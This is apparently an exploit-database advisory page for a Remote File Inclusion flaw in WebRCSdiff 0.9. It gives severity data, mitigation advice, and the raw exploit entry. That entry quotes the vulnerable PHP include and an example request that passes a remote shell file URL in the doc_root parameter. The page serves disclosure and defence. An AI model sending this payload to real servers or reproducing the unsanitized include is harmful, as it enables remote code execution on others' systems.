header-logo
Suggest Exploit
vendor:
WebRCSdiff
by:
Fl0riX - Bug Researchers
8,8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: WebRCSdiff
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: NO
Related CWE: N/A
CPE: webrcsdiff:0.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

WebRCSdiff 0.9 Remote File Inclusion

WebRCSdiff 0.9 is vulnerable to a Remote File Inclusion vulnerability due to a lack of sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files. Additionally, the application should be configured to only allow the inclusion of files from trusted sources.
Source

Exploit-DB raw data:

========================================================
= Author: Fl0riX - Bug Researchers

= Application  Name : WebRCSdiff 0.9

= Vulnerable  Type: Remote File Inclusion

= Download: http://sourceforge.net/projects/webrcsdiff/files/webrcsdiff/0.9%20Release/webrcsdiff-0.9.tar.zip/download

= Risk : High

= Infection: Uzaktan Dosya Dahil edilebilir.

========================================================

=
 Error c0d3;
     include ("$doc_root/dir_config.php");

========================================================

=
 Example;
 site/viewver?doc_root=http://fl0rix/shell.txt?
========================================================

Navigation

Suggest Exploit

Services By CQR